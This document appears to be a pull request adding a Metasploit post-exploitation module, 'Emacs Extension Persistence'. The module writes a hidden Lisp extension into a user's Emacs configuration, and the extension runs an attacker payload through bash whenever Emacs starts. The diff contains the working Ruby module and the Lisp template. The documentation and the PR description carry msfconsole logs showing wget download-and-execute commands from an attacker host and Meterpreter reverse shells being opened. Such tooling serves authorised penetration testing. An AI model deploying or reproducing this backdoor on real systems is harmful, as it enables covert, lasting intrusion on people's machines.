### PR TITLE
emacs extension persistence

### DIFF
--- a/data/exploits/emacs_extension/template.el
+++ b/data/exploits/emacs_extension/template.el
@@ -1,0 +1,15 @@
+(defun PLUGIN_NAME--process-sentinel (proc event)
+  (when (memq (process-status proc) '(exit signal))
+    (delete-process proc)))
+
+(defun PLUGIN_NAME-run-async ()
+    (make-process
+     :name "PLUGIN_NAME"
+     :buffer nil
+     :command (list "bash" "-li" "-c" "PAYLOAD_PLACEHOLDER")
+     :noquery t
+     :sentinel #'PLUGIN_NAME--process-sentinel))
+
+(add-hook 'emacs-startup-hook #'PLUGIN_NAME-run-async)
+
+(provide 'PLUGIN_NAME)

--- a/documentation/modules/exploit/linux/persistence/emacs_extension.md
+++ b/documentation/modules/exploit/linux/persistence/emacs_extension.md
@@ -1,0 +1,118 @@
+## Vulnerable Application
+
+This module adds a lisp based malicious extension to the emacs configuration file.
+When emacs is opened, the extension will be loaded and the payload will be executed.
+
+Tested against emacs 29.3 build 1 on Ubuntu Desktop 24.04.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install emacs
+2. Start msfconsole
+3. Get a shell
+4. Do: `use exploit/linux/persistence/emacs_extension`
+5. Do: `set session #`
+6. Do: `run`
+7. You should get a shell when `emacs` is started.
+
+## Options
+
+### NAME
+
+Name of the extension. Defaults to random
+
+### CONFIG_FILE
+
+Config file location on target. Defaults to `~/init.el`
+
+## Scenarios
+
+### emacs 29.3 build 1 on Ubuntu Desktop 24.04.
+
+Initial Shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 7
+target => 7
+resource (/root/.msf4/msfconsole.rc)> set srvport 8082
+srvport => 8082
+resource (/root/.msf4/msfconsole.rc)> set uripath l
+uripath => l
+resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4446
+lport => 4446
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 1.1.1.1:4446 
+[*] Using URL: http://1.1.1.1:8082/l
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO AD6apRwS --no-check-certificate http://1.1.1.1:8082/l; chmod +x AD6apRwS; ./AD6apRwS& disown
+msf exploit(multi/script/web_delivery) > 
+[*] 2.2.2.2    web_delivery - Delivering Payload (250 bytes)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 2.2.2.2:42830) at 2026-01-31 22:48:46 -0500
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer     : ubuntu-desktop-2404
+OS           : Ubuntu 24.04 (Linux 6.14.0-37-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: ubuntu
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Install persistence
+
+```
+msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/emacs_extension
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(linux/persistence/emacs_extension) > set session 1
+session => 1
+msf exploit(linux/persistence/emacs_extension) > set FETCH_COMMAND wget
+FETCH_COMMAND => wget
+msf exploit(linux/persistence/emacs_extension) > exploit
+[*] Command to run on remote host: wget -qO ./CdYxekmN http://1.1.1.1:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./CdYxekmN;./CdYxekmN&
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /t70WmtC4mNeBieRpZqn09Q
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf exploit(linux/persistence/emacs_extension) > [*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. emacs is installed
+[*] Using plugin name: FFuvdiIc
+[*] /home/ubuntu/.emacs.d/init.el does not exist, creating it
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/ubuntu-desktop-2404_20260131.5137/ubuntu-desktop-2404_20260131.5137.rc
+```
+
+Launch `emacs`
+
+```
+msf exploit(linux/persistence/emacs_extension) > 
+[*] Client 2.2.2.2 requested /t70WmtC4mNeBieRpZqn09Q
+[*] Sending payload to 2.2.2.2 (Wget/1.21.4)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:42262) at 2026-01-31 22:51:43 -0500
+
+```

--- a/modules/exploits/linux/persistence/emacs_extension.rb
+++ b/modules/exploits/linux/persistence/emacs_extension.rb
@@ -1,0 +1,107 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Emacs Extension Persistence',
+        'Description' => %q{
+          This module adds a lisp based malicious extension to the emacs configuration file.
+          When emacs is opened, the extension will be loaded and the payload will be executed.
+
+          Tested against emacs 29.3 build 1 on Ubuntu Desktop 24.04.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die'
+        ],
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' => [
+          # Leo Laporte [02:39:08]: Plus, as easy as it would be to write a malicious plugin for Emacs, I don't think anybody's going to do that. The pickings are slim, let's put it that way.
+          [ 'URL', 'https://twit.tv/posts/transcripts/security-now-1061-transcript'],
+          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION]
+        ],
+        'DisclosureDate' => '2026-01-28',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_advanced_options [
+      OptString.new('NAME', [ false, 'Name of the extension. Defaults to random', '' ]),
+      OptString.new('CONFIG_FILE', [ false, 'Config file location on target. Defaults to ~/init.el', '' ]),
+    ]
+
+    deregister_options('WritableDir')
+  end
+
+  def check
+    return CheckCode::Safe('emacs is required') unless command_exists?('emacs')
+
+    CheckCode::Detected('emacs is installed')
+  end
+
+  def plugin_name
+    return datastore['NAME'] unless datastore['NAME'].empty?
+
+    Rex::Text.rand_text_alpha(5..10)
+  end
+
+  def get_home
+    return cmd_exec('echo ~').strip
+  end
+
+  def install_persistence
+    p_name = plugin_name
+    vprint_status("Using plugin name: #{p_name}")
+    emacs_dir = "#{get_home}/.emacs.d"
+    config_file = datastore['CONFIG_FILE'].empty? ? "#{emacs_dir}/init.el" : datastore['CONFIG_FILE']
+    lisp_dir = "#{emacs_dir}/lisp"
+    extension_file = "#{lisp_dir}/#{p_name}.el"
+
+    if file?(config_file)
+      config_contents = read_file(config_file)
+      path = store_loot('init.el', 'text/x-common-lisp', session, config_contents, nil, nil)
+      print_good("Config file saved in: #{path}")
+      @clean_up_rc << "upload #{path} #{config_file}\n"
+    else
+      print_status("#{config_file} does not exist, creating it")
+      cmd_exec("mkdir #{emacs_dir}") unless directory?(emacs_dir) # don't use mkdir since that auto deletes on module finish
+      write_file(config_file, '')
+      @clean_up_rc << "rm #{config_file}\n"
+    end
+
+    unless directory?(lisp_dir)
+      cmd_exec("mkdir #{lisp_dir}")
+      @clean_up_rc << "rmdir #{lisp_dir}\n"
+    end
+
+    fail_with(Failure::UnexpectedReply, "Unable to append to extension to #{config_file}") unless append_file(config_file, "\n(add-to-list 'load-path \"#{lisp_dir}\")\n(require '#{p_name})\n")
+
+    emacs_extension = File.read(File.join(
+      Msf::Config.data_directory, 'exploits', 'emacs_extension', 'template.el'
+    ))
+    emacs_extension = emacs_extension.gsub('PAYLOAD_PLACEHOLDER', payload.encoded)
+
+    emacs_extension = emacs_extension.gsub('PLUGIN_NAME', p_name)
+    fail_with(Failure::UnexpectedReply, "Unable to write extension #{extension_file}") unless write_file(extension_file, emacs_extension)
+    @clean_up_rc << "rm #{extension_file}\n"
+  end
+end

--- a/modules/exploits/linux/persistence/emacs_extension.rb
+++ b/modules/exploits/linux/persistence/emacs_extension.rb
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Local
     if file?(config_file)
       config_contents = read_file(config_file)
       path = store_loot('init.el', 'text/x-common-lisp', session, config_contents, nil, nil)
-      print_good("Config file saved in: #{path}")
+      print_good("Original config file saved in: #{path}")
       @clean_up_rc << "upload #{path} #{config_file}\n"
     else
       print_status("#{config_file} does not exist, creating it")


### PR DESCRIPTION
@leolaporte on Security Now 1061 said "Plus, as easy as it would be to write a malicious plugin for Emacs, I don't think anybody's going to do that. The pickings are slim, let's put it that way."

Well, now we have a malicious lisp (🤢) extension generator for persistence. When you have a shell on the box, simply run this module and it will install the extension. Next time emacs is launched, you'll get another shell.


## Verification

List the steps needed to make sure this thing works

1. Install emacs
2. Start msfconsole
3. Get a shell
4. Do: `use exploit/linux/persistence/emacs_extension`
5. Do: `set session #`
6. Do: `run`
7. You should get a shell when `emacs` is started.

### Example run

```
msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/emacs_extension
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/persistence/emacs_extension) > set session 1
session => 1
msf exploit(linux/persistence/emacs_extension) > set FETCH_COMMAND wget
FETCH_COMMAND => wget
msf exploit(linux/persistence/emacs_extension) > exploit
[*] Command to run on remote host: wget -qO ./CdYxekmN http://1.1.1.1:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./CdYxekmN;./CdYxekmN&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /t70WmtC4mNeBieRpZqn09Q
[*] Started reverse TCP handler on 1.1.1.1:4444 
msf exploit(linux/persistence/emacs_extension) > [*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. emacs is installed
[*] Using plugin name: FFuvdiIc
[*] /home/ubuntu/.emacs.d/init.el does not exist, creating it
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/ubuntu-desktop-2404_20260131.5137/ubuntu-desktop-2404_20260131.5137.rc
```

Launch `emacs`

```
msf exploit(linux/persistence/emacs_extension) > 
[*] Client 2.2.2.2 requested /t70WmtC4mNeBieRpZqn09Q
[*] Sending payload to 2.2.2.2 (Wget/1.21.4)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:42262) at 2026-01-31 22:51:43 -0500
```